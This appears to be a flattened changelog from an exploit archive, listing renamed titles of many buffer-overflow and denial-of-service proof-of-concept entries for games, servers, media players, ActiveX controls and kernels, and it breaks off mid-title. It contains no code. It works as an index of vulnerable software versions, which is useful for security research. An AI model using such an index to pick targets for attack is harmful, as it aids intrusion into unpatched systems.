
26 changes to exploits/shellcodes Need for Speed 2 - Remote Client Buffer Overflow Need for Speed 2 - Remote Client Buffer Overflow (PoC) Red Faction 1.20 - Server Reply Remote Buffer Overflow Red Faction 1.20 - Server Reply Remote Buffer Overflow (PoC) Medal of Honor - Remote Buffer Overflow Medal of Honor - Remote Buffer Overflow (PoC) Monolith Games - Local Buffer Overflow Monolith Games - Local Buffer Overflow (PoC) BaSoMail - Multiple Buffer Overflow Denial of Service Vulnerabilities BaSoMail - Multiple Buffer Overflow (Denial of Service) (PoC) Vulnerabilities Orbz Game 2.10 - Remote Buffer Overflow Orbz Game 2.10 - Remote Buffer Overflow (PoC) Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow (PoC) KNet Web Server 1.04c - Buffer Overflow Denial of Service KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC) ProRat Server 1.9 (Fix-2) - Buffer Overflow Crash ProRat Server 1.9 (Fix-2) - Buffer Overflow / Crash (PoC) Mozilla Products - 'Host:' Buffer Overflow Denial of Service String Mozilla Products - 'Host:' Buffer Overflow (Denial of Service) (PoC) String Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service Virtools Web Player 3.0.0.100 - Buffer Overflow (Denial of Service) (PoC) FlatFrag 0.3 - Buffer Overflow / Denial of Service FlatFrag 0.3 - Buffer Overflow (Denial of Service) (PoC) zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service zawhttpd 0.8.23 - GET Remote Buffer Overflow (Denial of Service) (PoC) TinyFTPD 1.4 - 'USER' Remote Buffer Overflow Denial of Service TinyFTPD 1.4 - 'USER' Remote Buffer Overflow (Denial of Service) (PoC) Genecys 0.2 - Buffer Overflow / NULL pointer Denial of Service Genecys 0.2 - Buffer Overflow / NULL Pointer (Denial of Service) PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow Denial of Service PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow (Denial of Service) (PoC) FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow (Denial of Service) (PoC) Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Denial of Service) (PoC) TFTP Server 1.3 - Remote Buffer Overflow Denial of Service TFTP Server 1.3 - Remote Buffer Overflow (Denial of Service) (PoC) LeadTools Raster - Dialog File_D Object Remote Buffer Overflow LeadTools Raster - Dialog File_D Object Remote Buffer Overflow (PoC) LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow (PoC) Xserver 0.1 Alpha - POST Remote Buffer Overflow Xserver 0.1 Alpha - 'POST' Remote Buffer Overflow (PoC) Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow (PoC) QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow (PoC) Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow / Denial of Service Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow (Denial of Service) (PoC) Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow (Denial of Service) (PoC) Google Picasa 3.5 - Local Buffer Overflow (Denial of Service) Google Picasa 3.5 - Local Buffer Overflow (Denial of Service) (PoC) Printoxx - Local Buffer Overflow Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC) Printoxx - Local Buffer Overflow (PoC) Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC) Apollo Player 37.0.0.0 - '.aap' Buffer Overflow Denial of Service Apollo Player 37.0.0.0 - '.aap' Buffer Overflow (Denial of Service) (PoC) Switch Sound File Converter - '.mpga' Buffer Overflow Denial of Service Switch Sound File Converter - '.mpga' Buffer Overflow (Denial of Service) (PoC) Wireshark 1.2.5 - LWRES getaddrbyname Stack Buffer Overflow Xerox Workcenter 4150 - Remote Buffer Overflow Wireshark 1.2.5 - 'LWRES getaddrbyname' Stack Buffer Overflow (PoC) Xerox Workcenter 4150 - Remote Buffer Overflow (PoC) iPhone / iTouch FtpDisc 1.0 - Buffer Overflow / Denial of Service iPhone / iTouch FtpDisc 1.0 - Buffer Overflow (Denial of Service) (PoC) Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow (PoC) Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC) FontForge - '.BDF' Font File Stack Buffer Overflow Mocha LPD 1.9 - Remote Buffer Overflow (Denial of Service) (PoC) FontForge - '.BDF' Font File Stack Buffer Overflow (PoC) Multiple Vendor AgentX++ - Stack Buffer Overflow Multiple Vendor AgentX++ - Stack Buffer Overflow (PoC) Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow (PoC) Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow (PoC) FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow (PoC) LeadTools ActiveX Raster Twain 16.5 - 'LtocxTwainu.dll' Buffer Overflow LeadTools ActiveX Raster Twain 16.5 - 'LtocxTwainu.dll' Buffer Overflow (PoC) Altova DatabaseSpy 2011 - Project File Handling Buffer Overflow Altova DatabaseSpy 2011 - Project File Handling Buffer Overflow (PoC) Platinum SDK Library - POST UPnP 'sscanf' Buffer Overflow Platinum SDK Library - POST UPnP 'sscanf' Buffer Overflow (PoC) Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow (PoC) Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service) Hanso Player 1.4.0.0 - 'Skinfile' Buffer Overflow (Denial of Service) Real player 14.0.2.633 - Buffer Overflow / Denial of Service GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service Real player 14.0.2.633 - Buffer Overflow (Denial of Service) (PoC) GOM Media Player 2.1.6.3499 - Buffer Overflow (Denial of Service) (PoC) BulletProof FTP Client 2010 - Buffer Overflow BulletProof FTP Client 2010 - Buffer Overflow (PoC) KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (PoC) KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC) Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows (PoC) CSF Firewall - Buffer Overflow CSF Firewall - Buffer Overflow (PoC) Tracker Software pdfSaver ActiveX 3.60 - 'pdfxctrl.dll' Stack Buffer Overflow (SEH) Tracker Software pdfSaver ActiveX 3.60 - 'pdfxctrl.dll' Stack Buffer Overflow (SEH) (PoC) Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service Edraw Diagram Component 5 - ActiveX Buffer Overflow (Denial of Service) (PoC) Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC) Asterisk - 'ast_parse_digest()' Stack Buffer Overflow Asterisk - 'ast_parse_digest()' Stack Buffer Overflow (PoC) GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow (PoC) Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow (PoC) Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow Denial of Service Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow (Denial of Service) (PoC) Lattice Diamond Programmer 1.4.2 - Buffer Overflow Lattice Diamond Programmer 1.4.2 - Buffer Overflow (PoC) Ipswitch IMail 5.0 - Whois32 Daemon Buffer Overflow Denial of Service Ipswitch IMail 5.0 - Imapd Buffer Overflow Denial of Service Ipswitch IMail 5.0 - LDAP Buffer Overflow Denial of Service Ipswitch IMail 5.0 - IMonitor Buffer Overflow Denial of Service Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow Denial of Service Ipswitch IMail 5.0 - Whois32 Daemon Buffer Overflow (Denial of Service) (PoC) Ipswitch IMail 5.0 - Imapd Buffer Overflow (Denial of Service) (PoC) Ipswitch IMail 5.0 - LDAP Buffer Overflow (Denial of Service) (PoC) Ipswitch IMail 5.0 - IMonitor Buffer Overflow (Denial of Service) (PoC) Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow (Denial of Service) (PoC) Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service Netscape Enterprise Server 3.6 - SSL Buffer Overflow (Denial of Service) (PoC) Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow (PoC) Gene6 G6 FTP Server 2.0 - Buffer Overflow Denial of Service Gene6 G6 FTP Server 2.0 - Buffer Overflow (Denial of Service) (PoC) RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow RedHat Linux 6.x - X Font Server Buffer Overflow (Denial of Service) Computalynx CProxy Server 3.3 SP2 - Buffer Overflow Denial of Service Computalynx CProxy Server 3.3 SP2 - Buffer Overflow (Denial of Service) (PoC) Cerberus FTP Server 1.x - Buffer Overflow Denial of Service Cerberus FTP Server 1.x - Buffer Overflow (Denial of Service) (PoC) Microsoft SQL Server 2000 - SQLXML Buffer Overflow Microsoft SQL Server 2000 - 'SQLXML' Buffer Overflow (PoC) Microsoft SQL Server 2000 / Microsoft Jet 4.0 Engine - Unicode Buffer Overflow Microsoft SQL Server 2000 / Microsoft Jet 4.0 Engine - Unicode Buffer Overflow (PoC) Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow (PoC) Hotfoon Dialer 4.0 - Buffer Overflow Hotfoon Dialer 4.0 - Buffer Overflow (PoC) IISPop 1.161/1.181 - Remote Buffer Overflow Denial of Service IISPop 1.161/1.181 - Remote Buffer Overflow (Denial of Service) (PoC) Linksys Devices 1.42/1.43 - GET Buffer Overflow Linksys Devices 1.42/1.43 - 'GET' Buffer Overflow (PoC) iCal 3.7 - Remote Buffer Overflow iCal 3.7 - Remote Buffer Overflow (PoC) Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow (PoC) Dr.Web 4.x - Virus Scanner Folder Name Buffer Overflow Dr.Web 4.x - Virus Scanner Folder Name Buffer Overflow (PoC) Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow (PoC) Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow (PoC) Zoner Photo Studio 15 b3 - Buffer Overflow Zoner Photo Studio 15 b3 - Buffer Overflow (PoC) Novell Netware Enterprise Web Server 5.1/6.0 - CGI2Perl.NLM Buffer Overflow Novell Netware Enterprise Web Server 5.1/6.0 - 'CGI2Perl.NLM' Buffer Overflow (PoC) IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow IBM U2 UniVerse 10.0.0.9 - 'uvrestore' Buffer Overflow (PoC) Avant Browser 8.0.2 - 'HTTP Request' Buffer Overflow Avant Browser 8.0.2 - 'HTTP Request' Buffer Overflow (PoC) NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow (PoC) myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow (PoC) EffectOffice Server 2.6 - Remote Service Buffer Overflow EffectOffice Server 2.6 - Remote Service Buffer Overflow (PoC) Surfboard HTTPd 1.1.9 - Remote Buffer Overflow Surfboard HTTPd 1.1.9 - Remote Buffer Overflow (PoC) 1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow 1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow (PoC) Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow (PoC) Mcafee FreeScan CoMcFreeScan Browser - Object Buffer Overflow Mcafee FreeScan CoMcFreeScan Browser - Object Buffer Overflow (PoC) Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow (PoC) DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow (PoC) VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow (PoC) aGSM 2.35 Half-Life Server - Info Response Buffer Overflow aGSM 2.35 Half-Life Server - Info Response Buffer Overflow (PoC) cURL - Buffer Overflow cURL - Buffer Overflow (PoC) TagScanner 5.1 - Stack Buffer Overflow TagScanner 5.1 - Stack Buffer Overflow (PoC) Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow (PoC) Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow Denial of Service Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC) QwikMail 0.3 - HELO Command Buffer Overflow QwikMail 0.3 - 'HELO' Buffer Overflow (PoC) NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow (PoC) Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities (PoC) Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow (PoC) AN HTTPD - 'CMDIS.dll' Remote Buffer Overflow AN HTTPD - 'CMDIS.dll' Remote Buffer Overflow (PoC) Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service Serva 32 TFTP 2.1.0 - Buffer Overflow (Denial of Service) (PoC) Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow (PoC) Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow (PoC) PlanetDNS PlanetFileServer - Remote Buffer Overflow PlanetDNS PlanetFileServer - Remote Buffer Overflow (PoC) Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow (PoC) Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow (PoC) LeapFTP Client 2.7.3/2.7.4 - '.LSQ' File Remote Buffer Overflow LeapFTP Client 2.7.3/2.7.4 - '.LSQ' File Remote Buffer Overflow (PoC) VbsEdit 5.9.3 - '.smi' Buffer Overflow VbsEdit 5.9.3 - '.smi' Buffer Overflow (PoC) Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow (PoC) AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow (PoC) DSocks 1.3 - 'Name' Buffer Overflow DSocks 1.3 - 'Name' Buffer Overflow (PoC) IcoFX 2.5.0.0 - '.ico' Buffer Overflow IcoFX 2.5.0.0 - '.ico' Buffer Overflow (PoC) Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow Microsoft Windows XP - 'cmd.exe' Buffer Overflow Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow (PoC) Microsoft Windows XP - 'cmd.exe' Buffer Overflow (PoC) Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities Packeteer PacketShaper 8.0 - Multiple Buffer Overflow (Denial of Service) (PoC) Vulnerabilities Bochs 2.3 - Buffer Overflow / Denial of Service Bochs 2.3 - Buffer Overflow (Denial of Service) (PoC) Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow (PoC) Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (1) Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (2) Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (1) Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (2) T1lib - intT1_Env_GetCompletePath Buffer Overflow T1lib - 'intT1_Env_GetCompletePath' Buffer Overflow (PoC) Foxmail Email Client 6.5 - 'mailto' Buffer Overflow Foxmail Email Client 6.5 - 'mailto' Buffer Overflow (PoC) Microsoft Windows Media Digital Rights Management - ActiveX Control Buffer Overflow Yahoo! Toolbar 1.4.1 Helper - Class ActiveX Control Remote Buffer Overflow Denial of Service Microsoft Windows Media Digital Rights Management - ActiveX Control Buffer Overflow (PoC) Yahoo! Toolbar 1.4.1 Helper - Class ActiveX Control Remote Buffer Overflow (Denial of Service) (PoC) Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow (PoC) Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow (PoC) MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow (PoC) MW6 Technologies MaxiCode - ActiveX 'Data' Buffer Overflow MW6 Technologies MaxiCode - ActiveX 'Data' Buffer Overflow (PoC) Trend Micro OfficeScan - Buffer Overflow / Denial of Service Trend Micro OfficeScan - Buffer Overflow (Denial of Service) (PoC) ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow (PoC) Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow (PoC) Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow (PoC) NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow (PoC) ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow (PoC) A10 Networks ACOS 2.7.0-P2 (build: 53) - Buffer Overflow A10 Networks ACOS 2.7.0-P2 (Build 53) - Buffer Overflow (PoC) Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow (PoC) Jzip - Buffer Overflow (SEH Unicode) (Denial of Service) Jzip - Buffer Overflow (Denial of Service) (SEH Unicode) Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow (PoC) BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow (PoC) Adobe Flash Player 10.0.22 and AIR - URI Parsing Heap Buffer Overflow Adobe Flash Player 10.0.22 / AIR - URI Parsing Heap Buffer Overflow (PoC) Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow (PoC) Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow (PoC) Xerox WorkCentre - PJL Daemon Buffer Overflow Xerox WorkCentre - PJL Daemon Buffer Overflow (PoC) Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow (PoC) Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow (PoC) Mocha W32 LPD 1.9 - Remote Buffer Overflow Mocha W32 LPD 1.9 - Remote Buffer Overflow (PoC) Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC) BulletProof FTP Client 2010 - Buffer Overflow (SEH) BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC) Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow (PoC) D-Link WBR-2310 1.0.4 - GET Remote Buffer Overflow D-Link WBR-2310 1.0.4 - 'GET' Remote Buffer Overflow (PoC) HTML Help Workshop 1.4 - Buffer Overflow (SEH) HTML Help Workshop 1.4 - Buffer Overflow (SEH) (PoC) Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow / Denial of Service EIP Overwrite Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow (PoC) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC) G-WAN 2.10.6 - Buffer Overflow / Denial of Service G-WAN 2.10.6 - Buffer Overflow (Denial of Service) (PoC) Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow Denial of Service Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow (Denial of Service) (PoC) TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow TestDisk 6.14 - 'Check_OS2MB' Stack Buffer Overflow (PoC) ZOC SSH Client - Buffer Overflow (SEH) ZOC SSH Client - Buffer Overflow (SEH) (PoC) WebDrive 12.2 (B4172) - Buffer Overflow WebDrive 12.2 (B4172) - Buffer Overflow (PoC) PFTP Server 8.0f Lite - textfield Local Buffer Overflow (SEH) PFTP Server 8.0f Lite - textfield Local Buffer Overflow (SEH) (PoC) Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow (PoC) IKEView.exe Fox Beta 1 - Stack Buffer Overflow IKEView.exe R60 - Stack Buffer Overflow IKEView.exe Fox Beta 1 - Stack Buffer Overflow (PoC) IKEView.exe R60 - Stack Buffer Overflow (PoC) Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow (PoC) Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow (PoC) LanSpy 2.0.0.155 - Buffer Overflow LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow Last PassBroker 3.2.16 - Stack Buffer Overflow LanSpy 2.0.0.155 - Buffer Overflow (PoC) LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow (PoC) Last PassBroker 3.2.16 - Stack Buffer Overflow (PoC) Python 2.7 hotshot Module - 'pack_string' Heap Buffer Overflow Python 2.7 hotshot Module - 'pack_string' Heap Buffer Overflow (PoC) TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH) TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH) (PoC) TECO TP3-PCLINK 2.1 - '.tpc' Handling Buffer Overflow (PoC) TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow (PoC) IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - '_FXCLI_SetConfFileChunk' Stack Buffer Overflow (PoC) IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - '_FXCLI_GetConfFileChunk' Stack Buffer Overflow (PoC) Advanced Encryption Package Buffer Overflow - Denial of Service Advanced Encryption Package - Buffer Overflow (Denial of Service) (PoC) InfraRecorder - '.m3u' File Buffer Overflow InfraRecorder - '.m3u' File Buffer Overflow (PoC) Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution (PoC) Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow yTree 1.94-1.1 - Local Buffer Overflow Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow (PoC) yTree 1.94-1.1 - Local Buffer Overflow (PoC) NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow (PoC) CyberCop Scanner Smbgrind 5.5 - Buffer Overflow CyberCop Scanner Smbgrind 5.5 - Buffer Overflow (PoC) STIMS Buffer 1.1.20 - Buffer Overflow (SEH) (Denial of Service) STIMS Cutter 1.1.3.20 - Buffer Overflow Denial of Service STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC) STIMS Cutter 1.1.3.20 - Buffer Overflow (Denial of Service) (PoC) 4digits 1.1.4 - Local Buffer Overflow 4digits 1.1.4 - Local Buffer Overflow (PoC) Websockify (C Implementation) 0.8.0 - Buffer Overflow Websockify (C Implementation) 0.8.0 - Buffer Overflow (PoC) Google Android - '/system/bin/sdcard' Stack Buffer Overflow Google Android - '/system/bin/sdcard' Stack Buffer Overflow (PoC) Oracle Orakill.exe 11.2.0 - Buffer Overflow Oracle Orakill.exe 11.2.0 - Buffer Overflow (PoC) Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow (PoC) Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow Core FTP LE 2.2 - Path Field Local Buffer Overflow Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow (PoC) Core FTP LE 2.2 - Path Field Local Buffer Overflow (PoC) Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow (PoC) ConQuest DICOM Server 1.4.17d - Stack Buffer Overflow ConQuest DICOM Server 1.4.17d - Stack Buffer (PoC) QNAP NVR/NAS - Buffer Overflow QNAP NVR/NAS - Buffer Overflow (PoC) Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow CDex 1.96 - Buffer Overflow Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC) CDex 1.96 - Buffer Overflow (PoC) Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow (PoC) D3DGear 5.00 Build 2175 - Buffer Overflow D3DGear 5.00 Build 2175 - Buffer Overflow (PoC) VX Search Enterprise 10.1.12 - Denial of Service Disk Pulse Enterprise 10.1.18 - Denial of Service Sync Breeze Enterprise 10.1.16 - Denial of Service DiskBoss Enterprise 8.5.12 - Denial of Service BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC) APNGDis 2.8 - 'filename' Stack Buffer Overflow APNGDis 2.8 - 'filename' Stack 